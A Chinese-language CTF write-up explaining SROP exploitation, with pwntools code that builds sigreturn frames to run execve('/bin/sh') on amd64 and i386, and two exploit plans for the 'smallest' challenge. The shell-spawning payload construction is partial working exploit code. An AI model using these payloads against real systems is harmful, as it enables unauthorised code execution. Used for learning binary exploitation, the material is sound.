基础知识

Sigreturn Oriented Programming (SROP) Attack攻击原理
Sigreturn Oriented Programming攻击简介

SROP利用条件总结:

  1. 有一个bof可以控制栈上的内容
  2. 没有开canary
  3. 可以找到sigreturn的地址(或eax可控,可以找到syscall;ret的地址)
  4. 可以找到syscall的地址

SROP构造frame时,eax为系统调用号,eip为syscall的地址。根据elf arch设置rdi rsi rdx ecx r8 r9参数 或者 ebx ecx edx。esp可以设置可以不设置。 参考pwnlib.rop.srop模块。 比如:

# amd64
	context(os='linux', arch='amd64')
 	frame_execve = SigreturnFrame(kernel='amd64')
	frame_execve.rax = constants.linux.amd64.SYS_execve# 10
	frame_execve.rdi = rsp2 + 0x98 # rcx 
	frame_execve.rsi = 0
	frame_execve.rdx = 0
	frame_execve.rcx = 0x68732f6e69622f #/bin/sh
	frame_execve.rsp = rsp2
	frame_execve.rip = syscallret_addr
	payload3 = p64(start_addr) + 'D'*8 + str(frame_execve)
	sd(payload3)
	log.info('finish arrange context frame and return to 0x4000B0')
# i386
	context(os='linux', arch='i386')
	frame = SigreturnFrame(kernel='i386')
	frame.eax = constants.SYS_execve
	frame.ebx = stack_addr - 0x4 
	frame.ecx = 0
	frame.edx = 0
	frame.esp = stack_addr + 0x14 + 0x4 + 0x14 + 0x4 #0xdeadbeaf #stack_addr + 0x14 + 0x8
	frame.eip = syscall_addr

	ru("Let's start the CTF:")
	payload3 = ...  p32(sigreturn_addr) + p32(syscall_addr) + str(frame)

关于sigreturn和syscall的地址寻找也是利用的核心。 在i386 上 syscall和sigreturn可以在vdso中找到,因此需要有vdso的基址。 在amd64上,可以在vsyscall固定地址 0xffffffffff600000中找到,x/3i 0xffffffffff600000查看。 当然也可以用ROPgadget寻找,其它的寻找方式见基础知识链接,不一一总结了。

需要注意的是,sigreturn的功能仅仅是恢复frame中的内容到寄存器。 call sigreturn时,esp肯定是指向frame之前的地址的第一个字节(首位的一些字节被覆盖也没事)。 sigreturn_addr + str(frame)

如果是利用eax和syscall来完成sigreturn的功能。对于amd64,sys_rt_sigreturn的系统调用号rax为0xf,可以先利用一次bof把frame布置在栈上,再控制eax为0xf来完成利用。对于i386,sys_sigreturn的系统调用号eax为0x77(119),可以同时布置frame和控制eax来完成利用。

smallest

smallest 题目很简单,仅仅调用了read的syscall,开了NX。看到题目中存在syscall;retn,并且可以通过read来设置rax的值。对于SROP来说,最核心的syscall和sigreturn的地址已经解决了。

两个思路
1.srop 实现syscall mprotect + 读入shellcode执行
首先利用bof布置srop mprotect的frame,利用rop回到程序起始位置。根据read函数,控制rax的值来调用syscall实现sigreturn,完成mprotect功能(利用syscall;retn和rsp实现syscall chain返回程序起始位置)。再读入shellcode执行即可。

2.srop 实现syscall mprotect + srop实现syscall execve
实现mprotect后,即可以在.text段可以布置’/bin/sh\x00’,再利用一次srop即可。

附:exp